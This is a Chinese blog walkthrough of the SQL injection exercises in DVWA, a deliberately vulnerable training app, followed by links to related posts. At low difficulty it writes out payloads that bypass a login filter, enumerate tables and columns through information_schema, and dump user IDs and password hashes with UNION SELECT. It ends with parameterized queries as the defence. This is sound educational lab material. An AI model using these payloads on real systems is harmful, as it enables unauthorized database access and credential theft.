DVWA把玩:SQL注入(完结)

最新推荐文章于 2024-04-05 00:16:33 发布
最新推荐文章于 2024-04-05 00:16:33 发布
阅读量191 收藏
点赞数
分类专栏: 安全 文章标签: web 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_43466027/article/details/115719592
版权

0x00 简介

一个登录框
在这里插入图片描述然后我们的目标是让SQL把有用的东西(账号密码)吐出来…

0x01 low难度

首先不管有没有用先看一下网页源码:
在这里插入图片描述
GET方法意味着我们只需要改一改网站url就可以了,如果POST的话还需要用bp(或者直接在输入框里打字)

下面怎么拖库呢…?

先看看什么样的输入可以拖库:
构造载荷

' OR '1'='1

在这里插入图片描述
推断查询语句类似于

SELECT first_name, last_name FROM ? WHERE user_id = '$id';

下面看看库里有啥:

构造负荷:

' UNION SELECT table_name,1 FROM information_schema.tables; #

返回出来了一堆东西
在这里插入图片描述
一通分析决定继续提取users中的信息。先看一下user中有哪些列。构造载荷:

' UNION SELECT group_concat(COLUMN_NAME SEPARATOR  ','), 1 FROM information_schema.COLUMNS where Table_Name='users'; #

在这里插入图片描述
最后构造载荷:

' UNION SELECT user_id,password FROM users; #

在这里插入图片描述
到此为止,成功搞到id和密码。

0x02 medium难度

在这里插入图片描述
这里限制了id输入的选择,并且使用了POST方法。

POST方法的数据项是放在HTTP包体中的,因此我们直接BP抓包梭哈:
在这里插入图片描述
PS:Firefox经历了几次升级后,突然发现代理软件无法抓取到本地localhost的数据包了。解决办法如下:

  1. 浏览器url栏输入:about:config后回车
  2. 搜索框中输入:network.proxy.allow_hijacking_localhost设为true
    此举允许代理抓取localhost数据包

0x03 hard难度

在这里插入图片描述

在这里插入图片描述
我们发现原站点在点击链接之后起了一个session

在session中输入就可以了…

构造的载荷和效果如下:
在这里插入图片描述

0x04 小结

SQL注入漏洞是最常见的漏洞,主要用自动化工具验证漏洞,当然手动验证也需掌握。主要分6步:

  1. 判类型
  2. 猜列数
  3. 确定顺序
  4. 获当前库
  5. 获所有表、字段名
  6. 下载数据

防范SQL注入漏洞最实用的做法为使用安全的查询方式实现命令与数据分离,java中可用PrepareStatment,c#可用parameter,php可用pdo。

PenguinLeee
关注
专栏目录
DVWA通关攻略(适合新手)
夜思红尘的博客
04-12 9384
这里是关于网络安全入门的靶场DVWA,适合新手
dvwa如何打开_渗透测试入门DVWA 环境搭建
weixin_39908616的博客
12-18 353
DVWA是一款渗透测试的演练系统,在圈子里是很出名的。如果你需要入门,并且找不到合适的靶机,那我就推荐你用DVWA。我们通常将演练系统称为靶机,下面请跟着我一起搭建DVWA测试环境。如果你有一定的基础,可以直接看下面一章节。0、前言 这里用的是win7 系统,为啥要用win7。因为刚好我这里有现成的系统。其实你用windows 2008 等等的都是可以的,如下为windows 2008搭建。...
DVWA通关攻略零到一【全】
热门推荐
WX公众号-小白学安全
10-28 5万+
DVWA(Damn Vulnerable Web Application)一个用来进行安全脆弱性鉴定的PHP/MySQL Web 应用,旨在为安全专业人员测试自己的专业技能和工具提供合法的环境,帮助web开发者更好的理解web应用安全防范的过程。
dvwa靶场通关教程(保姆及教学,一看就会)
最新发布
m0_69043895的博客
04-05 8486
可以看到,Impossible级别的代码对上传文件进行了重命名(为md5值,导致%00截断无法绕过过滤规则),加入Anti-CSRF token防护CSRF攻击,同时对文件的内容作了严格的检查,导致攻击者无法上传含有恶意脚本的文件。让通过验证的情况增加了一种。回到payload,选择第二个爆破点,选择递归模式,recursive grep,设置初始值。看源代码可以发现,不仅限制了文件类型,而且限制了大小,不能少于100kb。可以看到,靶场对文件类型做了限制,只允许上传png、jpeg,并且检查。
DVWA全级别通关教程
m0_67393295的博客
07-28 874
首先选择难度,我们从low开始,如上图所示进行修改目录SQL手工注入过程:lowMediumhighImpossible??SQL 盲注过程:SQL 工具注入工具安装过程:过程:?lowMediumHigh:暴力破解过程:LowMediumHighImpossible命令注入过程:LowMediumHigh:Impossible文件上传过程:LowMediumHighImpossibleXSS漏洞过程:Low(反射型)MediumHigh?ImpossibleLow(存储型)MediumHighImposs
DVWA实验:SQL注入入门指南
本资源是一份关于"常规漏洞利用-SQL注入实验指导书"的详细文档。它旨在帮助学习者理解和实践SQL注入这一关键的网络安全概念。实验分为几个步骤,首先,需要在DVWA(Damn Vulnerable Web Application)平台上进行操作...
DVWA教程:SQL注入漏洞案例研究
"DVWASQL注入教程" 在2020年12月6日的一篇文章中,作者lll-yz探讨了如何通过DVWA(Damn Vulnerable Web Application)平台进行SQL注入学习。DVWA是一个用于教育和测试Web安全的开源工具,而本文着重于其中的SQL...
DVWA下的SQL注入
07-25
### DVWA下的SQL注入知识点详解 #### 一、SQL注入基础概念 SQL注入是一种常见的Web应用程序安全漏洞,攻击者可以通过这种手段将恶意SQL代码插入到应用程序的查询中,以达到非法访问或篡改数据的目的。在本篇内容中...
DVWASQL注入详解(包含知识点)
10-20
DVWA(Damn Vulnerable Web Application)的SQL注入(low)级别中,可以学习到多个关于SQL注入的知识点。例如,了解了SQL语句中的"ORDER BY"子句,它用于对查询结果进行排序。"ORDER BY 1"意味着按照第一个字段...
DVWA靶场实战:SQL注入漏洞解析
DVWA(Damn Vulnerable Web Application)是一个流行的安全学习平台,它模拟了各种常见的Web应用程序漏洞,其中包括SQL注入SQL注入是黑客利用不安全的SQL语句在用户输入中插入恶意代码,以获取未经授权的数据或...
DVWA环境的搭建
天威一号
11-01 121
1、下载 2、将移动到 WWW 目录下面; 3、在config目录下的dist后缀去掉; 4、在浏览器中127.0.0.1/DVWA/ 打开;
DVWA靶场之SQL注入通关详解,最新网络安全通用流行框架大全
04-03 1243
然后再输入1’页面错误,说明页面没有对1’进行过滤,也就是说攻击者可以对数据库进行操作。判断存在SQL注入后,接下来通过order by语句来猜解字段数。当在输入框中输入1’order by 3#时,页面出现不一样的界面,因此这里的字段数有两个。接下来,再通过union select来确定回显位置。如下图所示,回显位置为第二个。获取当前数据库(union select 1,database()),可以得到数据库为dvwa
DVWA-SQL Injection
tycyj的博客
01-24 115
SQL Injection LOW 服务器端核心代码 <?php if( isset( $_REQUEST[ 'Submit' ] ) ) { // Get input $id = $_REQUEST[ 'id' ]; // Check database $query = "SELECT first_name, last_name FROM users WHERE user_id = '$id';"; $result = mysqli_query($GLO
DVWA-sql注入学习
qq_44657899的博客
11-14 1649
文章目录SQL注入:1,sql注入基础知识2,DVWAsql注入 SQL注入: 1,sql注入基础知识 sql注入基础 一,分类 报错注入,盲注,union注入等。 二,原理 sql注入漏洞需满足以下两个条件: 1,参数用户可控:前端传给后端的参数内容是用户可以改变的。 2,参数代入数据库查询:传入的参数拼接到sql语句,且代入数据库查询。 三,order by 用法 1,order...
DVWA靶场
nidaxin的博客
01-29 2753
1.sql注入一般流程: 1)判断注入点:即判断是否存在sql注入,通常在参数后面加单引号,万能密码 2)判断查询的字段数 :order by 数字(数字从小到大,看是否报错) 3)确定回显位 4)获取信息函数: user() 获取当前用户用户 database() 获取当前数据库 version() 获取数据库版本 5)获取数据库名:1’ union select version(),database()# 6)获取名: 1‘union select 1,table_name fro
DVWA靶场下的sql注入之文件读写
waxcj的博客
05-09 1313
DVWA的安装配置在我上一篇文章上写过了,不知道的可以去看看,这里直接讲sql注入如何获得文件读写权限 sql注入读写的根本条件 1:数据库用户得是高权限用户(root) 2:数据库下的secure_file_priv不是null(如果是也可以通过其他方法读取和写入,后文会讲,可以在MySQL命令行中用这条语句查看secure_file_priv是否为null SHOW VARIABLES LIKE "secure_file_priv"; 如果为null,我们可以在D:/phpstudy/.
dvwa如何打开_DVWA学习笔记(二)
weixin_39634438的博客
12-18 1296
0x01 下载DVWA源码我这里使用的是Kali linux,在kali linux上搭建比较方便,所需的Apache、MySQL、PHP等环境都已经默认安装好了,也可以用windows(下载PHPStudy)或者Ubuntu(XAMPP|LAMP)等操作系统。看自己喜好!windows等安装方法可以到网上去搜索一下LINUX: wget https://github.com/ethicalhac...
dvwa如何打开_DVWA详细 安装
weixin_39545017的博客
12-18 1711
Wamp就是WindowsApacheMysqlPHP集成安装环境,即在window下的apache、php和mysql的服务器软件。PHP扩展、Apache模块,开启/关闭鼠标点点就搞定,再也不用亲自去修改配置文件了,WAMP它会去做。再也不用到处询问php的安装问题了,WAMP一切都搞定了。-------------------------------------------------...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

PenguinLeee

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值